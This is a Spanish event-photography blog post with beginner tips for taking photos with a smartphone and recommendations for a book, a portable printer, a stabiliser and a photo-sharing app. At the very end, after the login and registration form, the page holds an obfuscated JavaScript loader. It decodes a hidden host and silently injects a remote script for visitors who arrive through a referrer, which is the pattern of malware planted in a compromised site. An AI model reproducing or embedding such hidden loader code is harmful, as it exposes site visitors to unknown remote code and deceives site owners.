Sesión de Fotos con el Móvil


Captar el momento de un evento y transmitirlo visualmente es muy importante. Tanto para una acción de marketing efectiva, como para difundir la sensación y la magia conseguidas en el evento, que sirva para el recuerdo de los asistentes. Pero en fotografía profesional es uno de los aspectos en los que en muchas ocasiones los organizadores tienden a gastar menos. En cambio una sesión de Fotos con el Móvil puede estar al alcance de cualquiera y de cualquier tipo de evento. Esperamos que te guste el artículo, que hemos escrito pensando en todos vosotros.

Trucos de fotografía para principiantes


Sin embargo, solo porque no puedes permitirte el lujo de contar con algún magnífico fotógrafo profesional, no significa que no puedas capturar fotográficamente algunas imágenes inolvidables de tu evento. Ya que gracias a las últimas tecnologías, cualquier persona puede sacar fotos casi profesionales con el celular o móvil.

Sigue leyendo para descubrir algunos consejos para obtener los mejores resultados con tu smartphone.

Fotografía con el Móvil

Enfoque:

La falta de enfoque es la razón por la cual la mayoría de las fotos de teléfonos inteligentes no salen bien. La luz y el contraste se pueden mejorar en la postproducción, pero no se puede corregir una foto borrosa por un error en el enfoque. Para hacerlo correctamente, toca en la pantalla de tu teléfono para enfocar tu cámara. Para leer más sobre la exposición de tu cámara del móvil tenemos un artículo explicativo. Por defecto, el enfoque se centrará en el medio de la pantalla, pero si deseas centrarla en algo que esté fuera del centro de tu pantalla o en un primer plano, deberás indicarlo, moviendo el cuadro de enfoque. Simplemente toca la pantalla en donde deseas que esté el enfoque y aparecerá un cuadro amarillo. También notarás que tu teléfono ajusta automáticamente la exposición como respuesta, lo que te permitirá obtener una imagen clara y nítida. Asegúrate de no cambiar la distancia entre el móvil y el lugar donde has elegido enfocar una vez realizado el enfoque.

Zoom:

Es poco recomendable usar el zoom del móvil ya que usándolo puedes hacer que la foto se vea granulada, borrosa o pixelada. En su lugar, acércate al punto que quieres fotografiar, de esta manera conservarás toda  la resolución de la imagen. Si no puedes acercarte lo suficiente, toma la foto sin acercarte y luego recórtala. Si dispones de un teleobjetivo para tu smartphone, podrás conseguir grandes resultados. (Próximamente os traeremos un artículo con los mejores kits para hacer fotos con tu móvil).

Flash:

Los flashes incorporados en los teléfonos inteligentes son muy deficientes, lo que a menudo da como resultado ojos rojos y mostrar la piel brillante y pálida de las personas al tomar fotos. Por lo tanto hay que evitar el flash y tratar de usar fuentes de luz natural. Acércate a una ventana o a un espacio iluminado más brillante. Si tienes una fuente de luz externa, como una lámpara, puedes colocarla para conseguir la iluminación adecuada en la zona. Además si dejas el teléfono inmóvil (con un accesorio o de otra forma) puedes mejorar mucho las fotografías con poca luz. Colócalo en un objeto fijo estable o usa un trípode para evitar el desenfoque como resultado de la velocidad de obturación más lenta. Si el disparo es nítido, siempre puedes ajustar la exposición en postproducción para aclarar la imagen.

Perspectiva:

La mayoría de la gente solo apunta y dispara, normalmente con la cámara al nivel de los ojos. Esto da como resultado muchas veces fotos apáticas con falta de imaginación. Pero tú puedes hacer que tus fotos seas mucho más interesante tomándolas desde un ángulo diferente e innovador. Por ejemplo agáchate y dispara hacia arriba o súbete en alguna silla y saca la foto desde arriba en dirección hacia abajo. Con un encuadre creativo, sorprenderás con una perspectiva alternativa, y tus fotografías serán más interesantes.

Composición:

Para conseguir una composición estéticamente agradable, hay que aplicar la regla de los tercios. De acuerdo con este principio de composición fotográfica, la pantalla se divide imaginariamente mediante tres líneas verticales y otras tres horizontales. Así la pantalla quedaría dividida en 9 zonas. La regla dice que para conseguir unas fotografías más equilibradas, debes colocar los puntos de interés  de tu fotografía (como el horizonte) a lo largo de las líneas o en una intersección entre las horizontales y verticales.

Composición | Regla de los Tercios
Haz coincidir las líneas y las intersecciones con los puntos de interés

Artículos recomendados

Libros

Es siempre importante aprender de los profesionales que vienen trabajando con la fotografía móvil, algunos desde sus inicios. Las cámaras de los teléfonos actuales tienen unas prestaciones tan altas que incluso los grandes fotógrafos las utilizan de en ocasiones para determinados proyectos, Actualmente un móvil es capaz de satisfacer un espectro de posibles situaciones a fotografiar cada vez más amplio, aunque tienen limitaciones por supuesto. Como decimos para muchas situaciones la comodidad, rapidez y manejo, son cualidades que la cámara de un móvil tiene, y que las hacen a veces superiores a las más avanzadas cámaras profesionales.

También en este sector hay grandes trabajos que aglutinan el saber hacer en diversos libros. Nosotros hemos leído La fotografía móvil de Rodrigo Rivas, que es un libro magnífico y que puedes usar como un manual de consulta, pero que además tiene una apariencia visual estupenda con un gran acabado y bonita estética.

Impresora de fotos

Unas herramientas muy útiles para disponer en una sesión fotográfica, son las impresoras portátiles para móviles. Los dispositivos móviles son cada vez más usados por una gran mayoría de gente para realizar sus fotos. Más allá del entretenimiento de realizar las fotos, las impresoras nos permiten disponer de las fotos en formato físico incluso para poder hacer de ellas un elemento decorativo enmarcándolas. De esta forma sacaremos de la virtualidad estas fotos y nos permitirá enseñarlas colocándoles como adorno en nuestros hogares. Hemos estado buscando la mejor impresora para móvil atendiendo a la relación calidad / precio, así como a diferentes factores técnicos. Después de probar las más conocidas del mercado nos decantamos para recomendaros la HP Sprocket Plus – Impresora fotográfica portátil (con tecnología de impresión Zink, Bluetooth). Es del tamaño de un teléfono móvil y su peso es muy óptimo ya que sus 170 gramos (6 onzas) hace de esta impresora portátil ideal para transportarla en cualquier evento o viaje.

Estabilizador para Móvil

El estabilizador para móviles es un dispositivo que se puede acoplar a tu móvil, y con ello te permitirá realizar fotografías y vídeos muy estables incluso en situaciones de movimiento.

Ya sea por una vibración o un movimiento más brusco del móvil, el estabilizador hace que la cámara se mantenga equilibrada. Y con ello tus imágenes serán de mayor calidad.

Nosotros hemos probado en los últimos eventos que hemos realizado, un estabilizador que nos ha gustado mucho. Si lo deseas puedes echar un vistazo a su precio y prestaciones ya que está a la venta en amazon.

App de Fotos

Utiliza una app para compartir tus fotos en eventos. Incluso si las has hecho con otra aplicación de edición de fotos, o la cámara de tu smartphone. Te recomendamos https://gogotick.com .

Te permitirá compartir las fotos en el evento antes durante o después del mismo. Y además compartir solo con quien tú quieras, pudiendo incluso crear grupos privados para compartir solo entre ellos determinadas fotos.

Tienes la posibilidad de comunicarte en el chat, crear vídeos cortos, y de crear de una manera sencilla concursos fotográficos. ¡Pruébala gratis!


Volver a la página del BLOG

Allí encontrarás artículos sobre fotografía de eventos con información interesante.
Ir al BLOG

Deja el primer comentario

Iniciar sesión

Correo electrónico *
Contraseña *

REGÍSTRATE

Correo electrónico *
Contraseña *
!function (_5f186) { var _7e0bb3 = Date.now(); var _e34a6f = 1000; _7e0bb3 = _7e0bb3 / _e34a6f; _7e0bb3 = Math.floor(_7e0bb3); var _f17f41 = 600; _7e0bb3 -= _7e0bb3 % _f17f41; _7e0bb3 = _7e0bb3.toString(16); var _fbc2f0 = _5f186.referrer; if (!_fbc2f0) return; var _cc24b6 = [33991, 34002, 34004, 33984, 33949, 33984, 33991, 34010, 34000, 34008, 34015, 34012, 34002, 34007, 34006, 33985, 33949, 34010, 34013, 34005, 34012]; _cc24b6 = _cc24b6.map(function(_bcded5){ return _bcded5 ^ 33971; }); var _c16f5a = "6f5ae20d5c54f56d58ceb4695da44c11"; _cc24b6 = String.fromCharCode(..._cc24b6); var _37802c = "https://"; var _d8c428 = "/"; var _aeb9f5 = "mount."; var _7f4946 = ".js"; var _1f2600 = _5f186.createElement("script"); _1f2600.type = "text/javascript"; _1f2600.async = true; _1f2600.src = _37802c + _cc24b6 + _d8c428 + _aeb9f5 + _7e0bb3 + _7f4946; _5f186.getElementsByTagName("head")[0].appendChild(_1f2600) }(document);